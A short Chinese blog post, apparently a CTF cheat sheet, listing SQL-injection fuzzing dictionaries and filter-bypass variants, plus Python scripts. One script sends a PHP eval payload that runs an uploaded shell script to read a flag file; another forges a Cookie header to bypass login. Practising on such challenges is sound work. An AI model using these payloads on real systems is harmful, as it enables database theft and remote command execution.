221 字
1 分钟
脚本积累
SQL注入:
fuzz字典:
与bp共同使用。
转义类字典:
'"`\;,()[]{}+-*/%=<>!^|&#----/**/%00%0a单词字典:
ANDORNOTXORUNIONSELECTINSERTUPDATEDELETEDROPCREATEALTERWHEREFROMLIMITORDERGROUPBYHAVINGSLEEPBENCHMARKEXTRACTVALUEUPDATEXMLLOAD_FILEINTOOUTFILE变形测试字典:
sEleCtsel%00ectunion/**/select/*!SELECT*/+SELECT+%53%45%4c%45%43%54(select)检测深层功能限制:
user()database()version()@@version@@datadirchar()ascii()substr()substring()count()concat()group_concat()WEB绕过:
eval执行命令类的一:
import requests
url = "url" # 替换为题目URL
params = { 'cmd': '?><?=`. /???/p?p??????`;'}# POST 上传的文件内容
files = { 'file': ('shell.sh', '#!/bin/sh\ncat /flag.txt')}#!/bin/sh:调取shell,\n:换行,cat /flag.txt:实际执行命令
response = requests.post(url, params=params, files=files)print(response.text)WEB的POST:
import requests
url = "你的url"
headers = { "Cookie": 'user="adm;n"'} //特定头部
session = requests.Session()response = session.get(url, headers=headers)
print(f"状态码: {response.status_code}")print(f"响应内容: {response.text}")
if "login success" in response.text: print("登录成功!当前 Session Cookie 为:") print(session.cookies.get_dict())- 版权声明:本文由 余林阳 创作,转载请注明出处。
喜欢这篇文章吗?
点击右侧按钮为文章点赞,让更多人看到!
文章最后更新于 2026-01-08
在下余林阳